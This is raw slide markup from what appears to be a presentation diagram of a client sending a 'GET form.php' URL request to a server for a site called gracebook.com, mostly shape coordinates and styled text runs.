                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>made </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>gracebook.com </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>makes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>necessary</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>updates </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-67" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>server.</a:t>
            </a:r>
            <a:endParaRPr sz="40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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>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4" name="object 4"/>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5" name="object 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1140527" y="3026156"/>
            <a:ext cx="10724727" cy="2900680"/>
            <a:chOff x="855395" y="2269617"/>
            <a:chExt cx="8043545" cy="2175510"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="855395" y="2848648"/>
              <a:ext cx="507199" cy="507199"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1451863" y="2893237"/>
              <a:ext cx="417906" cy="417906"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="900048" y="3355797"/>
              <a:ext cx="417906" cy="401243"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1453768" y="3358349"/>
              <a:ext cx="414185" cy="414185"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6485762"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11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6485762"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12" name="object 12"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8831073" y="3595793"/>
            <a:ext cx="2920153" cy="2203027"/>
            <a:chOff x="6623304" y="2696845"/>
            <a:chExt cx="2190115" cy="1652270"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>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5" name="object 15"/>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6" name="object 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9507897" y="4657005"/>
            <a:ext cx="117094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form.p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2946401" y="3329939"/>
            <a:ext cx="6249247" cy="944880"/>
            <a:chOff x="2209800" y="2497454"/>
            <a:chExt cx="4686935" cy="708660"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="2634255"/>
              <a:ext cx="4686935" cy="171450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4653715" y="66399"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4648581" y="66399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648708" y="104499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578234" y="104578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4524756" y="135868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4519076" y="140846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515897" y="147409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515433" y="154709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517898" y="161903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4522948" y="167509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4529534" y="170650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536811" y="171100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4543933" y="168634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4686427" y="85449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4653715" y="66399"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="71606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="109706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578234" y="104578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4578234" y="104578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648708" y="104499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648699" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639056" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639056" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4648589" y="69066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4639056" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648699" y="101959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648589" y="69066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4648581" y="66399"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4610798" y="85525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4638929" y="69066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648589" y="69066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648581" y="66399"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4686934" h="171450">
                  <a:moveTo>
                    <a:pt x="4536612" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4529312" y="502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4522749" y="3694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4517771" y="9376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515306" y="16498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4515770" y="23774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4518949" y="30360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4524629" y="35411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4578047" y="66478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4653715" y="66399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4543806" y="2391"/>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2510154"/>
              <a:ext cx="3886200" cy="683260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="683260">
                  <a:moveTo>
                    <a:pt x="3886200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627754" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6142354" y="2934461"/>
              <a:ext cx="258445" cy="258445"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="258445" h="258444">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1" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2514600" y="2510154"/>
              <a:ext cx="3886200" cy="683260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="683260">
                  <a:moveTo>
                    <a:pt x="3627754" y="682751"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3679444" y="475995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627754" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424306"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5190744" y="3467608"/>
            <a:ext cx="1505373" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-93" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>form.php</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="3867437"/>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24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="3867438"/>
            <a:ext cx="2413000" cy="361574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33020" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="513067">
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>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7"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-167" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>acebook.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>om</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 2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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="795867" y="3127757"/>
            <a:ext cx="2167467" cy="2031153"/>
            <a:chOff x="596900" y="2345817"/>
            <a:chExt cx="1625600" cy="1523365"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="609600" y="2358517"/>
              <a:ext cx="1600200" cy="1497965"/>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5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="609600" y="2358517"/>
              <a:ext cx="1600200" cy="1497965"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1600200" h="1497964">
                  <a:moveTo>
                    <a:pt x="0" y="1497838"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1600200" y="1497838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1600200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1497838"/>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9645" y="3375660"/>
            <a:ext cx="1838960" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-8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7" name="object 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1140527" y="3026156"/>
            <a:ext cx="10724727" cy="2900680"/>
            <a:chOff x="855395" y="2269617"/>
            <a:chExt cx="8043545" cy="2175510"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="855395" y="2848648"/>
              <a:ext cx="507199" cy="507199"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1451863" y="2893237"/>
              <a:ext cx="417906" cy="417906"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="900048" y="3355797"/>
              <a:ext cx="417906" cy="401243"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1453768" y="3358349"/>
              <a:ext cx="414185" cy="414185"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6485762"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13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6485762"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14" name="object 14"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8831073" y="3595793"/>
            <a:ext cx="2920153" cy="2203027"/>
            <a:chOff x="6623304" y="2696845"/>
            <a:chExt cx="2190115" cy="1652270"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>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7" name="object 17"/>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8" name="object 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9507897" y="4657005"/>
            <a:ext cx="117094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form.p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2946401" y="3329939"/>
            <a:ext cx="6249247" cy="944880"/>
            <a:chOff x="2209800" y="2497454"/>
            <a:chExt cx="4686935" cy="708660"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="2634255"/>
